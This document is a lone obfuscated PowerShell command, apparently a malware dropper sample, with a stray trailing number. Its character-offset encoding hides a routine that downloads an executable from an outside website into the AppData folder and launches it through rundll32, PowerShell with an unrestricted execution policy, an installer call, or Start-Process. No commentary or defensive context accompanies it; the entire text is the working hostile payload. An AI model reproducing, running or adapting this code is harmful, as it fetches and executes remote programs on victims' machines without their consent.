powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function qpJjHLDo($uVcbIsX, $eaLSsHWCCXN){[IO.File]::WriteAllBytes($uVcbIsX, $eaLSsHWCCXN)};function DVBeAgXGLcA($uVcbIsX){if($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74780,74788,74788))) -eq $True){rundll32.exe $uVcbIsX }elseif($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74792,74795,74729))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $uVcbIsX}elseif($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74789,74795,74785))) -eq $True){misexec /qn /i $uVcbIsX}else{Start-Process $uVcbIsX}};function KZTnGLuIim($PUvDBgveWwSt){$GeYZtqmLiNmKNhsptsUr = New-Object (EPzzBsdceWQKTROW @(74758,74781,74796,74726,74767,74781,74778,74747,74788,74785,74781,74790,74796));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$eaLSsHWCCXN = $GeYZtqmLiNmKNhsptsUr.DownloadData($PUvDBgveWwSt);return $eaLSsHWCCXN};function EPzzBsdceWQKTROW($ROcJgaV){$kPpvRDRSpOgSD=74680;$WXEChlqT=$Null;foreach($oFldbbbrBOt in $ROcJgaV){$WXEChlqT+=[char]($oFldbbbrBOt-$kPpvRDRSpOgSD)};return $WXEChlqT};function SVCwtRUGvOCbMZRV(){$uKZbujBvJ = $env:AppData + '\';$kzCLtclO = $uKZbujBvJ + 'bin.exe'; if (Test-Path -Path $kzCLtclO){DVBeAgXGLcA $kzCLtclO;}Else{ $cdRgfZr = KZTnGLuIim (EPzzBsdceWQKTROW @(74784,74796,74796,74792,74738,74727,74727,74777,74794,74789,74777,74790,74777,74801,74781,74783,74784,74726,74779,74791,74789,74727,74794,74781,74777,74780,74789,74781,74727,74778,74785,74790,74726,74781,74800,74781));qpJjHLDo $kzCLtclO $cdRgfZr;DVBeAgXGLcA $kzCLtclO;};;;;}SVCwtRUGvOCbMZRV;
2168